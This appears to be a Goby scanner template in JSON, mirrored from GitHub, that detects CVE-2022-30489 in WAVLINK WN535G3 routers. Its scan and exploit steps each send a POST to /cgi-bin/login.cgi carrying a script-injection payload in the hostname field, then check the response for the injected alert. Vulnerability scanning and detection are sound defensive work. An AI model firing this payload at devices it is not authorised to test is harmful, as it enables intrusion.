mirror of https://github.com/qwqdanchun/Goby.git
97 lines
4.2 KiB
JSON
97 lines
4.2 KiB
JSON
{
|
|
"Name": "WAVLINK WN535G3 POST XSS CVE-2022-30489",
|
|
"Level": "1",
|
|
"Tags": [
|
|
"xss"
|
|
],
|
|
"GobyQuery": "body=\"WN535G3\"",
|
|
"Description": "Headquartered in Shenzhen and with over 15 years of technology expertise, WAVLINK brand is rising rapidly in market of wireless network and comprehensive IT peripherals, which make things easier, smarter and more connected to people's life.",
|
|
"Product": "WAVLINK WN535G3",
|
|
"Homepage": "https://www.wavlink.com/",
|
|
"Author": "",
|
|
"Impact": "WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi.",
|
|
"Recommendation": "",
|
|
"References": [
|
|
"https://nvd.nist.gov/vuln/detail/CVE-2022-30489"
|
|
],
|
|
"HasExp": true,
|
|
"ExpParams": null,
|
|
"ExpTips": {
|
|
"Type": "",
|
|
"Content": ""
|
|
},
|
|
"ScanSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "POST",
|
|
"uri": "/cgi-bin/login.cgi",
|
|
"follow_redirect": true,
|
|
"header": null,
|
|
"data_type": "text",
|
|
"data": "newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=en",
|
|
"set_variable": []
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "alert",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": []
|
|
}
|
|
],
|
|
"ExploitSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"method": "POST",
|
|
"uri": "/cgi-bin/login.cgi",
|
|
"follow_redirect": true,
|
|
"header": null,
|
|
"data_type": "text",
|
|
"data": "newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=en",
|
|
"set_variable": []
|
|
},
|
|
"ResponseTest": {
|
|
"type": "group",
|
|
"operation": "AND",
|
|
"checks": [
|
|
{
|
|
"type": "item",
|
|
"variable": "$code",
|
|
"operation": "==",
|
|
"value": "200",
|
|
"bz": ""
|
|
},
|
|
{
|
|
"type": "item",
|
|
"variable": "$body",
|
|
"operation": "contains",
|
|
"value": "alert",
|
|
"bz": ""
|
|
}
|
|
]
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody|concat|"
|
|
]
|
|
}
|
|
],
|
|
"PostTime": "0000-00-00 00:00:00",
|
|
"GobyVersion": "0.0.0"
|
|
} |